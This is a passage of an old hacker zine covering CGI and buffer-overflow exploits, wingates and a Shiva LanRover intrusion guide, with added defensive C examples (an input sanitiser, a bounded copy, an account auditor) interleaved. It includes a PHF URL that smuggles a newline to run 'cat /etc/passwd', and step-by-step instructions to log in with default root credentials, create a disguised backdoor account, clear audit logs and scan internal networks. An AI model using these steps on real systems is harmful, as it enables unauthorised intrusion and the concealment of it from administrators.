  http://www.vulnerable.com/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd

This will execute the command:

  cat /etc/passwd

The %0a is an encoded newline, which is what gets PHF to run a second command; the %20 is used because it is the hex code for the ASCII space character and you can't put a literal space in the URL.
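The other side of this bug, as an added example that is not the zine's code: PHF handed the Qalias value to a shell-backed lookup after an escaping routine that forgot the newline, so a %0a in the query slipped a second command through. The check below URL-decodes a query value the way a CGI would and refuses anything carrying a newline or shell metacharacter; url_decode, cgi_arg_is_clean, check_qalias, qalias_accepted and decodes_to are names made up for this example.

```c
#include <stdio.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not one. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode %XX escapes and '+' in a CGI query value into dst (dstsz bytes).
   Returns the decoded length, or -1 on a malformed escape or lack of room. */
int url_decode(const char *src, char *dst, size_t dstsz)
{
    size_t n = 0;
    if (dstsz == 0) return -1;
    while (*src) {
        int c = (unsigned char)*src++;
        if (c == '%') {
            int hi = hexval((unsigned char)src[0]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)src[1]);
            if (hi < 0 || lo < 0) return -1;   /* "%0" or "%zz": reject */
            c = hi * 16 + lo;
            src += 2;
        } else if (c == '+') {
            c = ' ';
        }
        if (n + 1 >= dstsz) return -1;         /* keep room for the NUL */
        dst[n++] = (char)c;
    }
    dst[n] = '\0';
    return (int)n;
}

/* Characters that must never reach a popen()/system() style lookup such as
   PHF's call to ph.  The newline is the one PHF's escaping forgot; %0a
   decodes to exactly that byte. */
static const char SHELL_META[] = "\n\r;&|`$<>()[]{}*?~^'\"\\";

/* 1 if the decoded value is printable ASCII with none of the characters
   above, 0 otherwise. */
int cgi_arg_is_clean(const char *decoded)
{
    for (; *decoded; decoded++) {
        unsigned char c = (unsigned char)*decoded;
        if (c < 0x20 || c >= 0x7f) return 0;   /* control or non-ASCII byte */
        if (strchr(SHELL_META, c)) return 0;
    }
    return 1;
}

/* Decode a raw Qalias value into decoded[] and say whether the CGI should
   accept it: 1 = accept, 0 = reject (decoding failures are rejected too). */
int check_qalias(const char *raw, char *decoded, size_t dstsz)
{
    if (url_decode(raw, decoded, dstsz) < 0) return 0;
    return cgi_arg_is_clean(decoded);
}

/* Verdict only, with a private scratch buffer. */
int qalias_accepted(const char *raw)
{
    char scratch[256];
    return check_qalias(raw, scratch, sizeof scratch);
}

/* 1 if raw decodes to exactly expected (shows what the CGI would have seen). */
int decodes_to(const char *raw, const char *expected)
{
    char out[256];
    return url_decode(raw, out, sizeof out) >= 0 && strcmp(out, expected) == 0;
}

int main(void)
{
    /* Constructed inputs: an ordinary alias lookup, the injection string
       from the article, and a truncated escape. */
    const char *inputs[] = { "jsmith", "x%0acat%20/etc/passwd", "a%2" };
    size_t i;
    for (i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("%-24s -> %s\n", inputs[i],
               qalias_accepted(inputs[i]) ? "accept" : "REJECT");
    return 0;
}
```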
This command will give you the password file and then you can start using your favourite cracker to get the passwords :)

Other CGI Exploits

PHF is just one example of a CGI exploit. The CGI (Common Gateway Interface) is a system that allows people to interact with web pages. CGI programs are used in signup processes, games or almost anything on the web. PHF is an example of a vulnerability in a CGI program, but there are many others. The best known of these is the test-cgi exploit. This allows you to view the contents of any directory; although this doesn't automatically get you root access on the system, it will allow you to gather usernames of users on the system, and will sometimes show up any default accounts on the system.

2) Buffer Overflow Exploits

There are too many of these to name each of them, but they all work on the same principle. Examples of these would include statd, qpop and many more. Each program can store data in an area of memory called the stack. This stores data from each routine that a program calls. Take a program like this (a little programming knowledge is needed):

  #include <stdio.h>

  void hello(void)
  {
      printf("hello");
  }

  int main(void)
  {
      hello();                 /* call the routine, then carry on below */
      printf("now f**k off");
      return 0;
  }

This is a very simple program which calls a routine hello() to print "hello" to the screen (I would've used "hello world" but I couldn't spell world :)). When the procedure hello() is called, any data from the main program is put onto the stack. In this program there is no data that has to be stored, but it still has to store the location in the program, so that when it finishes running the procedure hello() it knows where it got to in the program and prints "now f**k off" next. To enable the program to do this, the return address of the next instruction is also stored on the stack. Helpfully, the buffer is arranged like this:

   _______
  |return |
  |address|
  |_______|
  |       |
  | Data  |
  |_______|

This means that the data is put on the stack in a nice convenient position, right next to the return address.
The data area is allocated as the total space needed for all the variables that have to be put on the stack. In our little program earlier there was no need to store any variables as there were none, but most programs will have variables that they need to store on the stack. How do ya exploit this? Look here:

  #include <string.h>

  void ouch(char *ot)
  {
      char hitme[10];              /* only 10 bytes reserved on the stack */
      strcpy(hitme, ot);           /* no length check: overruns if ot is longer */
  }

  int main(void)
  {
      char hehe[100];
      int i;
      for (i = 0; i < 99; i++)
          hehe[i] = 'A';
      hehe[99] = '\0';             /* terminate so strcpy knows where to stop */
      ouch(hehe);
      return 0;
  }

Now, here's where it gets a bit more exciting. First the string 'hehe' is filled with a long list of 'A's; this makes sure that the string is full. Then the function 'ouch' copies the string 'ot' into the string 'hitme'; in this function, 'ot' refers to the string 'hehe' in the main body of the program. 'hitme' is 10 characters long and so is allocated 10 bytes, but if we copy 'hehe', which is 100 bytes long, into 'hitme' we won't have enough space. Unfortunately the function we use to copy these 2 strings, strcpy, doesn't check the length of the strings before it copies them. This means that the contents of the string 'hitme' is bigger than the space allocated to it. This causes the string to overrun into other memory areas like this:

                        ______________
                       |              |
                       |              |
  Space allocated      |--------------|<------- Actual end of data area, due to
  for return    ---->  |              |         large size of 'hitme'
  address              |______________|<------- End of space allocated to data area
                       |              |
  Space allocated      |              |
  for data area ---->  |              |
                       |              |
                       |______________|

This means that some of the data area will be taken as the return address. In our program, the return address will be filled with a line of 'A's; this won't be a real address in the computer's memory, so it will obviously bomb out with an error. This type of error can be caused deliberately on some commercial programs and, more interestingly, unix security programs. This means we can manipulate the return address of the program to go to anywhere in the computer's memory.
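What the fix for ouch() looks like, as an added example that is not the zine's code: keep the fixed-size buffer but check the length before copying and refuse anything that doesn't fit, so nothing ever reaches the return address. bounded_copy, ouch_checked, fill_with_a and overflow_attempt_refused are names made up for this example.

```c
#include <stdio.h>
#include <string.h>

/* The bug in ouch() is that strcpy() writes strlen(ot)+1 bytes into a
   10-byte stack buffer whatever the length of ot.  The small buffer is
   fine; the missing piece is a check before the copy.  This copies only
   when the source, including its terminating NUL, fits, and returns -1
   (copying nothing) otherwise. */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0 || n >= dstsz)
        return -1;                 /* would overrun dst: refuse rather than truncate */
    memcpy(dst, src, n + 1);       /* n bytes plus the NUL */
    return 0;
}

/* Same shape as ouch(): a 10-byte local buffer, now guarded.  Returns the
   length actually stored, or -1 if the copy was refused.  (A compiler's
   stack protector would only abort the original after the overrun; this
   stops it before any byte is written.) */
int ouch_checked(const char *ot)
{
    char hitme[10];
    if (bounded_copy(hitme, sizeof hitme, ot) < 0)
        return -1;
    return (int)strlen(hitme);
}

/* Constructed input like main() in the article: a run of 'A's filling
   buf, NUL-terminated. */
void fill_with_a(char *buf, size_t bufsz)
{
    size_t i;
    if (bufsz == 0) return;
    for (i = 0; i + 1 < bufsz; i++)
        buf[i] = 'A';
    buf[bufsz - 1] = '\0';
}

/* Replay the scenario safely: 99 'A's handed to the 10-byte buffer.
   Returns 1 if the copy was refused, i.e. no overflow took place. */
int overflow_attempt_refused(void)
{
    char hehe[100];
    fill_with_a(hehe, sizeof hehe);
    return ouch_checked(hehe) == -1;
}

int main(void)
{
    printf("99 x 'A' into hitme[10]: %s\n",
           overflow_attempt_refused() ? "refused" : "copied (BUG)");
    printf("\"123456789\" into hitme[10]: %d chars stored\n",
           ouch_checked("123456789"));
    printf("\"1234567890\" into hitme[10]: %d (refused)\n",
           ouch_checked("1234567890"));
    return 0;
}
```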
The most common way of exploiting this is to place code into the data area of the buffer and have the return address point back to that point in the buffer; this means we can insert our own code into the program. This opens up the system to all sorts of wonderful effects :) This was not a total explanation of buffer overflows; for more information get Phrack issue 49-14. But if ya name's so1o ya don't need to bother with this, just type:

  exploit [vulnerable host]

But this is written for any real hacker who wants to know what goes on behind the code. More to come, but this file just gives ya a general feel for the exploits.

3) Wingates

Wingates have become very popular amongst hackers recently; they allow you to bounce a connection from any site running one of these. A wingate is basically a proxy server that allows you to send all your connections through that host. Unsurprisingly, because of the obvious security holes (and maybe because of the name :)), a wingate can only be run on a windoze server, or even just a home box can run a wingate. A wingate was initially built for a small windoze network to access the net over one line without all the hassle of setting up all the network software. In other words, it's another microshaft security hole, something we've seen a lot of in the last few years. Basically all ya have to do is find a computer with a wingate running and connect to it, then you can safely hack away :)

4) Exports

Some nice servers actually let you view almost any file on their system by allowing their whole file system to be mounted onto any foreign host. This is extremely kewl because it means that, if you are logged on as root on your system, you will have root privileges on the remote system.
This exploit also works in Windows, which is why you should never allow any of your directories to be shared when you are on the net, unless you don't mind losing the data in the directories and it doesn't contain any confidential stuff or (as with an unnamed person) your entire dox; that's just stupid.

--------------

More to come. This will give ya a general feel for the exploits, but I'll explain them in more detail in other files - just to keep ya coming back.

greetz:

Hybrid: Generally kewl geezer who nicks my modem :)
The old bloke who turns up in McDonald's at 2600 meets: One of the weirdest people in the world (Just beat me to it)
Pro Plus: keeping me awake during all those long hacking nights
The US military: Supplying all my shells
9x: supplying t-files so that everyone can copy them

---(OOooOO)--------Hacking the Shiva-LAN-Rover System-------------------(OOo-
---(OOooOO)--------by hybrid--------------------------------------------(OOo-
---(OOooOO)--------th0rn@coldmail.com-----------------------------------(OOo-

**************************************************
* Disclaimer:                                    *
*                                                *
* The information provided in this text file     *
* has been obtained from public domain resources *
* and is intended for educational use only.      *
*                                                *
**************************************************

Contents:

1. Introduction
2. What can Shiva lan rovers do?
3. The command line
4. System security
5. PPP

1. Introduction

Shiva systems are becoming increasingly popular in the LAN networking world. If like me you have done quite a lot of scanning you will have come across a login prompt similar to this:

  [@ Userid:]

If you have never seen this before, take a look at some of the 9x scans at www2.dope.org/9x. In this file I am going to focus on the security strengths and weaknesses of the ShivaLanRover networking system, and give a general overview of what can be done with such systems.
The Shiva system is a network security problem in its own right, in the sense that once you have gained access to one of these platforms you have the opportunity to explore the entire network on which the system is based; in essence, you are on the trusted side of the firewall. If you would like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it via the WWW.

To find a Shiva, the first thing you should do is dust off that old wardialer program and start scanning local or toll-free prefix assignments; if you can't do this, you suck, go away. You will know when you have found a Shiva when you are confronted with the following prompt:

  @ Userid:

or, if Radius authentication is enabled:

  Starting Radius Authentification....
  @ Userid:

Blah, ignore the Radius authentication thing for now; it's just a lame attempt to make the system look as if it has been secured. In most cases the sysadmin will have misconfigured the authentication and you will be surprised as to how easy it is to get in.

So you are at the login prompt, what next? As in most OS's, Shivas have a nice set of default logins, so the sysadmin's poor setup is your gain. Try this:

  login:
  pass:

The root login will work 9 times out of 10. The reason that the root account works a lot is because in some cases the admin is not even aware the account exists! Most of the system setup is done via the main terminal, so the admin doesn't have to log in. The root account is not listed in the userfile database, so most admins overlook it. In some cases the admin will have set up their own account with something like , but if the admin has any common sense you will not get in with that. Like most OS's, Shiva systems have an audit log, so don't sit there trying to brute force anything. Once you are in you can clear the system log, but more on that later. OK, you've found a Shiva and you've logged on as root, now what? Read on.
Once logged in, you will be dropped into the Shiva command line prompt, which should look something like this:

  Shiva LanRover/8E, Patch 4.5.4p6 98/06/09   (Version and type of Shiva)
  ShivaLanRover/8E#                           (The command prompt. Can be configured to say anything)

To get a list of the available commands type ? or help; this will reveal a menu similar to this:

  ShivaLanRover/8E# ?
  alert           Send text alert to all dial-in users
  busy-out line   Busy-out serial line modem
  clear           Reset part of the system
  comment         Enter a comment into the log
  configure       Enter a configuration session
  connect         Connect to a shared serial port
  crashdump       Write crashblock to log
  disable         Disable privileges
  help            List of available commands
  initialize      Reinitialize part of the system
  lan-to-lan      Manage LAN-to-LAN connections
  passwd          Change password
  ping            Send ICMP echo to IP host
  ppp             Start a PPP session
  quit            Quit from shell
  reboot          Schedule reboot
  show            Information commands, type "show ?" for list
  slip            Start a SLIP session
  telnet          Start a Telnet session
  testline        Test a line

The first thing you should do is check to see who is online. At the # prompt use the show command to reveal the list of current online users:

  ShivaLanRover/8E# show users
  Line  User    Activity  Idle/Limit  Up/Limit
     1  jsmith  PPP          0/ 10     0/ None
     2  root    shell        0/ 10     0/ None
  Total users: 2

So here we see ourselves logged in on line 2, and a PPP user on line 1. Note that most of the time users are not configured to be allowed remote dial-in PPP access, so the user jsmith is probably at a terminal on the LAN. Now you can see who is online, ie- check the admin is not logged in. Next you need to get a rough idea of the size of the system and its network.
At the # prompt type:

  ShivaLanRover/8E# show lines
  Async Lines:
  Line State  Rate/P/Stop/  RA|DCD|DSR|DTR|RTS|CTS|Fr errs|Overruns|PErrs
     1 IDLE    57600/N/ 1/    |OFF|ON |on |on |ON |      0|       0|    0
     2 CHAR    57600/N/ 1/    |ON |ON |on |on |ON |      2|       0|    0
     3 IDLE    57600/N/ 1/    |OFF|ON |on |on |ON |      0|       0|    0
     4 IDLE    57600/N/ 1/    |OFF|ON |on |on |ON |      0|       0|    0
     5 IDLE    57600/N/ 1/    |OFF|OFF|on |on |OFF|      0|       0|    0
     6 IDLE   115200/N/ 1/    |OFF|ON |on |on |ON |      0|       0|    0
     7 IDLE    57600/N/ 1/    |OFF|ON |on |on |ON |      0|       0|    0
     8 IDLE   115200/N/ 1/    |OFF|ON |on |on |ON |      0|       0|    0

Here we see a list of the modem ports; as you can see it has 8, which is about average for most Shiva systems. So now we know how many serial lines there are, we need to get a rough idea as to how big the network itself is. To do this type:

  ShivaLanRover/8E# show arp
  Protocol  Address         Age  Hardware Addr      Type  Interface
  Internet  208.122.87.6    4m   x0-x0-B0-2x-Dx-78  ARPA  Ethernet:IP
  Internet  208.122.87.4    4m   AA-0x-x4-00-0C-04  ARPA  Ethernet:IP
  Internet  208.122.87.5    4m   Ax-00-04-0x-xD-x4  ARPA  Ethernet:IP
  Internet  208.122.86.4    10m  AA-x0-04-00-0C-04  ARPA  Ethernet:IP
  Internet  208.122.86.40   0m   AA-00-04-00-x1-04  ARPA  Ethernet:IP
  Internet  208.122.86.147  4m   00-80-5x-31-F8-Ax  ARPA  Ethernet:IP
  Internet  208.122.86.145  4m   00-80-5x-FE-C9-x8  ARPA  Ethernet:IP
  Internet  208.122.86.200  0m   00-x0-A3-xF-21-C8  ARPA  Ethernet:IP
  Internet  208.122.86.51   4m   00-x0-B0-01-36-3x  ARPA  Ethernet:IP

Showing the arp cache reveals some of the boxes connected to the LAN, as well as their ethernet addresses and protocol type. Now we have established the kind of system we are on, it's time to do some exploring, which is where I shall begin this text file.

2. What can Shiva lan rovers do?

Shiva LanRover systems are very big security weaknesses if installed on any network. The reason for this is that some of the default settings can be easily overlooked by the admin.
A Shiva system can be configured to provide a wide variety of network services, some of which are listed here:

PPP (point-to-point protocol)

This is the key to gaining access to the network on which the Shiva is based. In most cases the network will have an internal DNS server, and if you are lucky, the network the system is on will be connected to the internet. Hint hint, PPP, toll-free. But just using a Shiva for free net access would be boring, which is why I am going to discuss the other features of Shivas.

Modem Outdial

In a lot of cases the system will have been configured to allow modem outdialing, which can be good for calling BBSs, diverting to other dialups, scanning; but again, this is lame, just using a Shiva for modem outdialing is boring, use your imagination. If you manage to get a PPP connection, and the system is net connected, you could get online and at the same time call your favourite BBS. I'll explain how to do all of this later.

Telnet, ping, traceroute etc.

These are the command line tools which will enable you to determine whether the system is connected to the internet or not. More on this later.

It's time to go into detail about all of the Shiva's functions and commands. I will concentrate on what you can do with root access, because that is the only account you are likely to gain access to.

3. The command line

When logged into the Shiva shell, you have the following commands at your disposal:

alert (Send text alert to all dial-in users)

Self explanatory.

busy-out uart (Busy-out UART port)

clear (Reset part of the system)

The clear command is a nice feature of the Shiva system. The first thing you should do when on a Shiva is make sure you erase all logs of your commands and login times etc. To do this all you need to do is type clear log. This will erase and reset the audit log, and also any invalid logins to the Shiva.
There are also other clear commands, but these will all cause system problems and get you noticed, so best leave them alone for the time being.

comment (Enter a comment into the log)

configure (Enter a configuration session)

Here's the part where you can get the system to do what you want it to do, ie- to get a PPP connection you will need to set up another account with shell and PPP privileges. The root account does not allow PPP connections, so here is where you will need to do your stuff. To get anywhere with a Shiva you need to create a new account; using the config command you can create a new user account with greater privileges than root. Before you make a new account it is a good idea to see what kind of setup the other accounts have on the system, as you don't want to make an account that will stick out from the other accounts, so type:

  show security

(this gives a list of the security configuration and the user list.) You should see something like this:

  [UserOptions]
  PWAttempts=0
  ARARoamingDelimiter=@
  ExpireDays=30
  GraceLogins=6
  [Users]
  admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425
  jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052
  mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052
  user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159
  another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9
  jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821
  msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052
  dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052
  padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1
  ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052

Here we get a list of the configured users on the system. As you can see the admin has made him/herself their own account, while other users have accounts that allow logins via their terminals, but not remotely.
In the above example all the users have been assigned passwords, so it would be a good idea when you make your own account to have one as well. The idea is to make an account that will blend in with the others and not look too obvious. The passwords in the external user list are all 3DES (triple DES) encrypted. The type of user account set up is determined by the options, such as jsmith=/di/do etc; more on these functions in a bit. OK, now we need to set up our own account. To do this we need to enter a configuration session; at the command line prompt type:

  ShivaLanRover/8E# config

You will then drop into the configuration session:

  Enter configuration file lines.  Edit using:
      ^X, ^U   clear line
      ^H, DEL  delete one character
      ^W       delete one word
      ^R       retype line
  Start by entering section header in square brackets []
  Finish by entering ^D or ^Z on a new line.
  config>

(here is where you enter the config commands; to make your own account do the following)

  config> [users]
  config> username=/di/do/sh/tp/pw
  config> ^D                        <------ (type control D to finish)
  Review configuration changes [y/n]? y
  New configuration parameters:
  [users]
  username=/di/do/sh/tp/pw
  Modify the existing configuration [y/n]? y
  You may need to reboot for all changed parameters to take effect.

You've just created your own user account, which you can use for PPP connections etc. To begin with your account is un-passworded, so when you log back in just hit enter for your password; you can change this later. The /sh part of the user configuration means you can remotely log into the command shell, /pw means you have the ability to define your own password, and if you wanted to give yourself another root account you would use the switch /rt. In combination with the show config command you can also alter other system configurations via this method, although it is a very good idea not to alter anything. Now your account has been set up, all you do is re-connect to the system and log in as your username; more on this later.
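The same user list read from the admin's side, as an added example that is neither the zine's code nor Shiva's: a small auditor for the [Users] lines shown above that flags accounts able to reach the shell or root without a stored password, which is exactly what the account created above looks like. parse_user_line, account_is_risky and audit_users are names made up here; the code assumes the '/'-separated switch layout seen in the listing and that a stored hash never contains '/'.

```c
#include <stdio.h>
#include <string.h>

/* One parsed entry from the [Users] section of 'show security'.  Switches
   are the ones the article explains: /sh remote shell, /rt root, /pw may
   set own password; pwd= carries the stored password.  /di, /do, /tp etc.
   are only counted. */
struct shiva_user {
    char name[32];
    int shell, root, setpw, has_pwd, other_flags;
};

static void classify(struct shiva_user *u, const char *tok, size_t len)
{
    if (len == 2 && memcmp(tok, "sh", 2) == 0) u->shell = 1;
    else if (len == 2 && memcmp(tok, "rt", 2) == 0) u->root = 1;
    else if (len == 2 && memcmp(tok, "pw", 2) == 0) u->setpw = 1;
    else if (len > 4 && memcmp(tok, "pwd=", 4) == 0) u->has_pwd = 1;
    else if (memchr(tok, '=', len) == NULL) u->other_flags++;
    /* ml=, fail=, time=, grace= are bookkeeping and ignored */
}

/* Parse "name=/flag/flag/pwd=hash/ml=2/..." into *u.  Returns 0 on success,
   -1 for any other line ([Users] header, PWAttempts=0, ...).  Assumes a
   stored hash never contains '/', which holds for the listing above. */
int parse_user_line(const char *line, struct shiva_user *u)
{
    const char *eq = strchr(line, '=');
    const char *p;
    size_t namelen;

    if (!eq || eq == line || eq[1] != '/') return -1;
    namelen = (size_t)(eq - line);
    if (namelen >= sizeof u->name) return -1;
    memset(u, 0, sizeof *u);
    memcpy(u->name, line, namelen);
    u->name[namelen] = '\0';
    p = eq + 1;
    while (*p == '/') {                  /* one "/switch" per iteration */
        const char *end = strchr(++p, '/');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        classify(u, p, len);
        p += len;
    }
    return 0;
}

/* An account an admin should look at: shell or root access with no stored
   password, i.e. what 'username=/di/do/sh/tp/pw' above creates. */
int account_is_risky(const struct shiva_user *u)
{
    return (u->shell || u->root) && !u->has_pwd;
}

/* Walk a 'show security' dump line by line; returns the number of risky
   accounts and names them on stdout. */
int audit_users(const char *dump)
{
    int risky = 0;
    const char *p = dump;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        struct shiva_user u;
        if (len < sizeof line) {
            memcpy(line, p, len);
            line[len] = '\0';
            if (parse_user_line(line, &u) == 0 && account_is_risky(&u)) {
                printf("risky: %-10s shell=%d root=%d stored password: %s\n",
                       u.name, u.shell, u.root, u.has_pwd ? "yes" : "NONE");
                risky++;
            }
        }
        p += len;
        if (*p == '\n') p++;
    }
    return risky;
}

/* Constructed sample in the format of the listing above; the hashes are
   dummies, not real Shiva output. */
const char SAMPLE_DUMP[] =
    "[UserOptions]\n"
    "PWAttempts=0\n"
    "[Users]\n"
    "admin=/di/do/rt/pw/sh/pwd=DUMMYHASH00000000000000001/ml=3/time=425\n"
    "jsmith=/di/pw/pwd=DUMMYHASH00000000000000002/ml=2/time=897646052\n"
    "krad=/di/do/sh/tp/pw\n"
    "backup=/di/do/rt/pw/sh/ml=1\n";

int main(void)
{
    printf("%d risky account(s)\n", audit_users(SAMPLE_DUMP));
    return 0;
}
```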
connect (Connect to a serial port or modem)

This is another one of the good features of Shivas: you can remotely control a series of modems on the system, and in a lot of cases dial out. If you want to call a BBS, note you cannot upload using Zmodem or similar protocols, although you would be able to download, but expect a few CRC checksum errors. To connect to a modem type:

  connect all_ports

You will then drop into one of the modem pools, as follows:

  Connecting to Serial2 at 115200 BPS.
  Escape character is CTRL-^ (30).
  Type the escape character followed by C to get back,
  or followed by ? to see other options.

(here basic modem commands are necessary; use the following to dial out)

  ATZ              (initialise modem)
  ATDTxxxxxxxxx    (ATDT then phone number)

Note that in some cases the modem outdial will be based upon the system PBX, so sometimes you will have to figure out the outdialing code, which should be something simple like dialing a 9 before the number you want to connect to. To disconnect from the outdialing session type control C, or ^C. This will take you back to the command line. As with the other system events, outdialing is logged into the audit file, along with the number you called. It is generally a good idea to clear the audit log after things like PPP or dialout; again just type clear log.

cping (Send continuous ICMP echoes to IP host)
crashdump (Write crashblock to log)
detect (Detect the configuration of an interface)
disable (Disable your root privileges)
dmc (Information commands, type "dmc ?" for list)
    down (last Remove modems from CCB pool)
    info (Print info for specified modem)
    mupdate (l Update Rockwell modem FW)
    state (Print state of a modem)
    status (Print status of all modems)
    trace (Trace message passing)
    up (lastmo Add modems to CCB pool)
    test_1slot (Tests DMC card in slot specified)
    test_allcards (Tests all DMC cards found in system)
    test_golden (Tests all DMC cards against a Golden DMC)
    test_loopall (Tests All DMC's for count)
    test_modempair (modem1 Tests modems against each other)
    test_slotpair (Tests a DMC card against another)
    test_xmitloop (Tests modem pair for count)
help (List of available commands)
history (List of previous commands)
initialize (Reinitialize part of the system)
l2f (L2F commands)
    close (Close tunnel to L2F HG)
    login (Start L2F session)
    tunnels (Show open tunnels)
lan-to-lan (Manage LAN-to-LAN connections)
passwd (Change password)
ping (Send ICMP echo to IP host)
ppp (Start a PPP session)
quit (Quit from shell)
reboot (Schedule reboot)
route (Modify a protocol routing table)
rlogin (Start an rlogin session)
show (Information commands, type "show ?" for list)
show+
    account (Accounting information)
    arp (ARP cache)
    bridge (Bridging information)
    buffers (Buffer usage)
    configuration (Stored configuration, may specify sections)

The show config command will reveal all the system configuration setups, including DNS server information, security configurations, IP routing etc. It will also show the internal IPs of the Radius authentication and TACACS servers.

show+
    finger (Current user status)
    interfaces [name1 [name2 ... ]] (Interface information)
    ip (Internet Protocol information, type "show ip ?" for list)

To get an idea of the routing information, and again how big the network is, type show ip route. This will bring up a routing table, and again give you an idea as to where the connected boxes are; it is a good idea to note the IP prefixes.
show+
    lan-to-lan (LAN-to-LAN connections)
    license (Licensing information)
    lines (Serial line information)
    log (Log buffer)

The show log command will display the system audit log in more format. Here you will be able to see what is going on on the system, ie- is it primarily used for PPP, dialout etc. If users use the system for outdialing, you can even see the numbers that they dial. Here is a cut-down example of what you would see in a system log file:

  Mon 15 16:24:29 GMT 1998 4530 Serial4: "krad" logged in
  00:01 4531 Serial4:PPP: Received LCP Code Reject for code 0D
  00:01 4532 Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B)
  00:00 4533 Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast
  00:00 4534 Serial4:PPP: IPCP layer up
  00:04 4535 Serial4:PPP: CCP layer up
  14:09 4536 Serial4:PPP: IPCP layer down
  00:00 4537 Serial4:PPP: CCP layer down
  00:00 4538 Serial4:PPP: LCP layer down
  00:01 4539 Serial4:PPP: CD dropped on connection
  00:00 4540 Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,)
  00:06 4541 Serial4: Rate 115200bps
  00:00 4542 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
  00:01 4543 Serial4: Initialized modem
  04:56 4544 setting time of day from real-time clock to Wed Nov 25 16:43:44
  18:27 4545 Serial4: New Dial-In session
  00:00 4546 Serial4:PPP: LCP layer up
  00:00 4547 Serial4: "krad" logged in
  00:01 4548 Serial4:PPP: Received LCP Code Reject for code 0C
  00:00 4549 Dialin:IPX configured net 9823O049
  00:00 4550 Serial4:PPP: IPXCP layer up
  00:00 4670 Serial4: New Command Shell session
  00:03 4671 Serial4: "root" logged in
  01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell)
  00:06 4673 Serial4: Rate 115200bps
  00:01 4674 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
  00:00 4675 Serial4: Initialized modem
  55:11 4676 Could not parse IP SNMP request.

In the system log you will also see invalid login attempts, error messages, and general system events.
Because the log file logs everything, it is a good idea to erase your own presence in it.

show+
    modem (Internal modem information, type "show modem ?" for list)
    netbeui (NetBeui information, type "show netbeui ?" for list)
    novell (NetWare information, type "show novell ?" for list)
    ppp (PPP multilink bundles and links)
    processes (Active system processes)
    security (Internal userlist)
    semaphores (Active system semaphores)
    slot (Internal serial slot information, type "show slot ?" for list)
    upload (Upload information)
    users (Current users of system)
    version (General system information, also shows DNS info)
    virtual-connections (Virtual Connection information)
slip (Start a SLIP session)
telnet (Start a Telnet session)
tftp (Download new image, ie- system config files)
tunnel (Start a Tunnel session)
wan [action] (Perform actions on WAN Interface)

4. System security

Shivas can be very weak on security, due to the exposed root account. If the system is configured properly they can be very secure systems, although this is usually not the case. There are many security options for the Shiva system, including Radius authentication, SecurID, TACACS, and just the standard secured login. In some cases an admin will use a secondary server to act as the Radius authentication server. In this case, the setup would look something like this:

  [RADIUS Authentication Server]  } The server contains a secured user
               |                    list, which will be used to verify
               |                    login requests. The login is
            [Router]                determined if the user can be
               |                    verified by the server.
               |                  } The Shiva sends the login request to RADIUS.
         [Shiva System]           } Starting Radius Authentification...
                                    @ Userid:

Sometimes a system will be configured to work with a number of different Shivas on a network. For example, using the same idea as above but without the Radius server, a secondary Shiva may be installed to act as the security server, and all other Shiva systems refer to it for user login verification.
This can be a real bitch if you have logged into a system where the above setup has been implemented. For example, say you logged in as root and you want to set up a PPP account. The first thing you would do is check to see what kind of setup existing users have by typing show security. If the verification server has been set up, there will be no users in the user list; instead you have to find the network location of the verification server, and hope it has an un-passworded root account on it. To find the verification server, or primary Shiva, just use the show config command. You can then telnet from the Shiva you are on to the Shiva displayed in the config file; you should then get the @ Userid: login screen again, try root no pass. If this does not work, it is possible to temporarily configure your own server on the network, but this would mean other users will not be able to log in, so leave this alone. If you do manage to log in to the server as root, you have to set up your user account there, because that is where all the Shivas on the network refer to in order to verify users; this way the admin only has to maintain one user configuration file.

5. PPP

Once you have set up a user account with shell and PPP privileges, you can begin exploring the network on which the Shiva is based. If the network is net connected you can get free net access as well, but this is quite risky, especially if the admin notices PPP sessions active at 4am with destinations such as irc.ais.net:6667. When you first establish a PPP connection to a Shiva server, the first thing you should do is map out the network. To do this just run a network or port scanner across the domain which the Shiva is on. As on most networks, you are likely to come across a variety of different boxes, such as UNIX boxes, SunOS, shared printers, mail servers, cisco routers; in one case someone I know found an Amiga box@$!.
